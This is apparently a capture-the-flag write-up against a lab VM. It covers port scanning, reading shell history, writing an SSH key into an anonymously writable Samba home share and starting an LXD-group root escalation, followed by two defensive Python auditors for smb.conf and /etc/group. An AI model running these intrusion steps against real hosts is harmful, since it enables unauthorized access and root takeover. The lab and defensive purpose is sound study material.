```
❯ ip=192.168.19.128
❯ rustscan -a $ip -- -A -sV | tee scan.txt
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.19.128:22
Open 192.168.19.128:80
Open 192.168.19.128:139
Open 192.168.19.128:445
Open 192.168.19.128:10123
[~] Starting Script(s)

Scanned at 2024-12-11 19:51:07 CST for 91s
PORT      STATE SERVICE      REASON         VERSION
22/tcp    open  tcpwrapped   syn-ack ttl 63
| ssh-hostkey:
|   3072 0a:16:3f:c8:1a:7d:ff:f5:7a:66:05:63:76:7c:5a:95 (RSA)
| ssh-rsa
|   256 f5:d3:36:44:43:40:3d:11:9b:d1:a6:24:9f:99:93:f7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGxxEWdO4HTDIvYJI6pxeLoTxqG4E5E12Skl+WGpQTkd
80/tcp    open  http         syn-ack ttl 63 Apache httpd 2.4.46 ((Ubuntu))
|_http-title: HackerCTF
|_http-server-header: Apache/2.4.46 (Ubuntu)
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-favicon: Unknown favicon MD5: B214420B4A40927A3E19330A43080E56
139/tcp   open  netbios-ssn? syn-ack ttl 63
445/tcp   open  netbios-ssn  syn-ack ttl 63 Samba smbd 4.6.2
10123/tcp open  tcpwrapped   syn-ack ttl 63
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 2.6.18 (92%), Cisco Unified Communications Manager VoIP adapter (92%), Linux 2.6.26 (PCLinuxOS) (92%), Linux 2.6.30 (92%), Dish Network Hopper media device (91%), Linux 2.6.32 (91%), Linux 3.2.0 (91%), Linux 3.7 (91%), MikroTik RouterOS 6.15 (Linux 3.3.5) (91%), Tomato 1.27 - 1.28 (Linux 2.4.20) (91%)
No exact OS matches for host (test conditions non-ideal).
```
```
❯ curl $ip:10123/.bash_history
sudo su -
ifconfig
ls
cd upload/
ls
ls -l
cd ..
ls -l
chmod 755 jarves/
❯ curl $ip:10123/.mysql_history
_HiStOrY_V2_
exit
❯ curl $ip:10123/something
I wanted to make it my home directory. But idea must be changed.
```
```
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        welcome         Disk      Welcome to Hackerctf LAB
        IPC$            IPC       IPC Service (hackerctflab server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.19.128 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
❯ smbclient -N \\\\$ip\\welcome
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat May  8 15:42:49 2021
  ..                                  D        0  Sat May  8 02:38:58 2021
  .mysql_history                      H       18  Sat May  8 15:05:03 2021
  .profile                            H      807  Sat Mar 20 00:02:58 2021
  upload                              D        0  Sun May  9 19:19:02 2021
  .sudo_as_admin_successful           H        0  Sat May  8 13:34:48 2021
  .bash_logout                        H      220  Sat Mar 20 00:02:58 2021
  .cache                             DH        0  Sat May  8 02:39:15 2021
  something                           N       82  Sat May  8 00:18:09 2021
  secrets                             N        0  Sat May  8 00:15:17 2021
  .bash_history                       H       72  Sun May  9 19:23:26 2021
  .bashrc                             H     3771  Sat Mar 20 00:02:58 2021

                19475088 blocks of size 1024. 9687800 blocks available
smb: \>
```
```
smb: \> mkdir .ssh
smb: \> cd .ssh
smb: \.ssh\> put authorized_keys
putting file authorized_keys as \.ssh\authorized_keys (359.8 kb/s) (average 359.9 kb/s)
❯ ssh jarves@$ip -i id_rsa
The authenticity of host '192.168.19.128 (192.168.19.128)' can't be established.
ED25519 key fingerprint is SHA256:nB+xRANNsBufP64KnDjxamkvfGVw1eJUiz/kCMnJ9wU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.19.128' (ED25519) to the list of known hosts.
Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-16-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Dec 11 01:07:47 PM UTC 2024

  System load:  0.0               Processes:             238
  Usage of /:   45.1% of 18.57GB  Users logged in:       0
  Memory usage: 25%
  Swap usage:   0%

  => There were exceptions while processing one or more plugins. See
     /var/log/landscape/sysinfo.log for more information.

 * Pure upstream Kubernetes 1.21, smallest, simplest cluster ops!

     https://microk8s.io/

9 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sun May  9 11:14:10 2021
jarves@hackerctflab:~$
```
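The foothold above relies on a Samba share that is writable without credentials and that is actually a user's home directory, so a public key can be written into `.ssh/authorized_keys`. The following script is an added example (not part of the writeup or of Samba) that audits an `smb.conf` for exactly that pattern: it parses Samba's INI-like syntax, understands the synonyms `writable`/`writeable` and `guest ok`/`public` and the inverted `read only` key, and flags shares that combine anonymous access with write access or with a path under `/home`. The embedded configuration is a constructed sample that mirrors the `welcome` share seen on this box, not the lab's real file.

```python
"""Audit an smb.conf for shares that combine guest access with write access
or expose a home directory.  Added example; the embedded config is constructed."""
import configparser
from pathlib import PurePosixPath

WRITE_KEYS = ("writable", "writeable")   # yes => clients may write
GUEST_KEYS = ("guest ok", "public")      # yes => no credentials required

# Constructed sample modelled on the 'welcome' share from the writeup.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)
   map to guest = bad user

[printers]
   comment = All Printers
   path = /var/spool/samba
   guest ok = no
   read only = yes

[welcome]
   comment = Welcome to Hackerctf LAB
   path = /home/jarves
   guest ok = yes
   writable = yes

[public]
   path = /srv/samba/public
   public = yes
   read only = no
"""


def _truthy(value):
    return value.strip().lower() in ("yes", "true", "1")


def _is_yes(opts, key):
    return _truthy(opts.get(key) or "")


def parse_smb_conf(text):
    """Return {share_name: {option: value}} with option names lower-cased."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   allow_no_value=True,
                                   empty_lines_in_values=False)
    cp.optionxform = lambda key: key.strip().lower()
    cp.read_string(text)
    return {section: dict(cp.items(section)) for section in cp.sections()}


def share_is_writable(opts):
    """Samba defaults to read-only; 'writable = yes' or 'read only = no' opens it."""
    if any(_is_yes(opts, key) for key in WRITE_KEYS):
        return True
    return "read only" in opts and not _is_yes(opts, "read only")


def share_allows_guest(opts):
    return any(_is_yes(opts, key) for key in GUEST_KEYS)


def exposes_home(name, opts):
    """True for the special [homes] share or any path under /home."""
    if name == "homes":
        return True
    path = opts.get("path") or ""
    return PurePosixPath(path).parts[:2] == ("/", "home")


def audit_smb_conf(text):
    """Return a list of findings: {'severity', 'share', 'path', 'reason'}."""
    findings = []
    for name, opts in parse_smb_conf(text).items():
        if name == "global":
            continue
        guest = share_allows_guest(opts)
        writable = share_is_writable(opts)
        home = exposes_home(name, opts)
        path = opts.get("path") or ""
        if guest and writable and home:
            findings.append(dict(severity="CRITICAL", share=name, path=path,
                reason="anonymous write access to a home directory (dotfiles such as .ssh/authorized_keys can be replaced)"))
        elif guest and writable:
            findings.append(dict(severity="HIGH", share=name, path=path,
                reason="anonymous write access"))
        elif guest and home:
            findings.append(dict(severity="MEDIUM", share=name, path=path,
                reason="anonymous read access to a home directory (shell and MySQL history, dotfiles)"))
    return findings


if __name__ == "__main__":
    import sys
    # Pass a real smb.conf path to audit a live file; otherwise use the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SMB_CONF
    for f in audit_smb_conf(text):
        print(f"[{f['severity']}] [{f['share']}] path={f['path'] or '?'}: {f['reason']}")
```

Run it as `python3 audit_smb.py /etc/samba/smb.conf` on a host you administer; the fix for a CRITICAL finding is to move the share out of `/home` (or drop `guest ok`), and in any case not to let a guest-writable share sit on top of a directory whose dotfiles an SSH daemon or login shell will trust.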
Root privilege escalation
Noticed a local MySQL instance and tried the password obtained earlier:
```
jarves@hackerctflab:/var/www$ ss -luntp
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
----------------- omitted -------------------------
tcp   LISTEN 0      151        127.0.0.1:3306      0.0.0.0:*
                                            [::]:*
jarves@hackerctflab:/var/www$ mysql -u root -p
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
```
Couldn't log in 😅. I checked sudo privileges and had none either, but found that the jarves user belongs to the lxd group:
```
jarves@hackerctflab:/var/www$ id
uid=1000(jarves) gid=1000(jarves) groups=1000(jarves),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
```
```
jarves@hackerctflab:~/tmep$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Name of the new storage pool [default=default]:
Name of the storage backend to use (btrfs, ceph, dir, lvm, powerflex) [default=btrfs]:
Create a new BTRFS pool? (yes/no) [default=yes]:
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]:
Size in GiB of the new loop device (1GiB minimum) [default=5GiB]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
Would you like the LXD server to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]:
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
jarves@hackerctflab:~/tmep$ lxc init alpine privesc -c security.privileged=true
Creating privesc
jarves@hackerctflab:~/tmep$ lxc list
+---------+---------+----------------------+-----------------------------------------------+-----------+-----------+
|  NAME   |  STATE  |         IPV4         |                     IPV6                      |   TYPE    | SNAPSHOTS |
+---------+---------+----------------------+-----------------------------------------------+-----------+-----------+
| privesc | RUNNING | 10.192.193.77 (eth0) | fd42:f30f:4652:7bee:216:3eff:fe5d:9508 (eth0) | CONTAINER | 0         |
+---------+---------+----------------------+-----------------------------------------------+-----------+-----------+
```
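The `id` output is the whole story here: LXD's own documentation treats membership of the `lxd` group as equivalent to root on the host, because a member can create a container with `security.privileged=true` as shown above, and the same holds for `docker` and, depending on the sudoers policy, `sudo`/`wheel`. The script below is an added example (not from the writeup or from LXD) for the defender's side: it parses `/etc/group` and reports every non-root account that sits in such a group. The embedded group file is a constructed sample that reproduces the memberships jarves has on this box; the list of root-equivalent groups is an assumption reflecting common distributions and should be adjusted to local policy.

```python
"""Report non-root accounts in groups whose membership is root-equivalent.
Added example; the embedded /etc/group content is constructed."""

# Assumption: these groups grant root-equivalent access on typical Linux hosts.
ROOT_EQUIVALENT_GROUPS = {
    "lxd": "can create privileged LXD containers on the host",
    "docker": "can create containers that mount the host filesystem",
    "sudo": "may run commands as root (check /etc/sudoers)",
    "wheel": "may run commands as root (check /etc/sudoers)",
    "disk": "can read and write raw block devices",
}

# Constructed sample matching the writeup's `id` output for jarves.
SAMPLE_GROUP = """\
root:x:0:
adm:x:4:syslog,jarves
cdrom:x:24:jarves
sudo:x:27:jarves
dip:x:30:jarves
plugdev:x:46:jarves
lxd:x:116:jarves
docker:x:998:
www-data:x:33:
"""


def parse_group(text):
    """Parse /etc/group text into {group_name: (gid, [members])}."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 4:
            continue  # malformed line: skip rather than guess
        name, _password, gid, members = fields
        groups[name] = (int(gid), [m for m in members.split(",") if m])
    return groups


def root_equivalent_members(text):
    """Return {user: [(group, reason), ...]} for non-root users in risky groups."""
    findings = {}
    for name, (_gid, members) in parse_group(text).items():
        reason = ROOT_EQUIVALENT_GROUPS.get(name)
        if reason is None:
            continue
        for user in members:
            if user == "root":
                continue
            findings.setdefault(user, []).append((name, reason))
    return findings


def audit_report(text):
    """One human-readable line per (user, group) finding."""
    lines = []
    for user, hits in sorted(root_equivalent_members(text).items()):
        for group, reason in hits:
            lines.append(f"{user}: member of '{group}' -> {reason}")
    return lines


if __name__ == "__main__":
    import sys
    # `--live` audits the real /etc/group; the default uses the constructed sample.
    source = open("/etc/group").read() if "--live" in sys.argv else SAMPLE_GROUP
    for line in audit_report(source) or ["no root-equivalent group members found"]:
        print(line)
```

On the sample this reports jarves twice, once for `sudo` and once for `lxd`. The mitigation is simply `gpasswd -d <user> lxd` for any account that does not need to manage containers; where LXD access is required, it should be treated as an administrator role, and `lxc list --format json` can be checked periodically for instances whose config carries `security.privileged: "true"`.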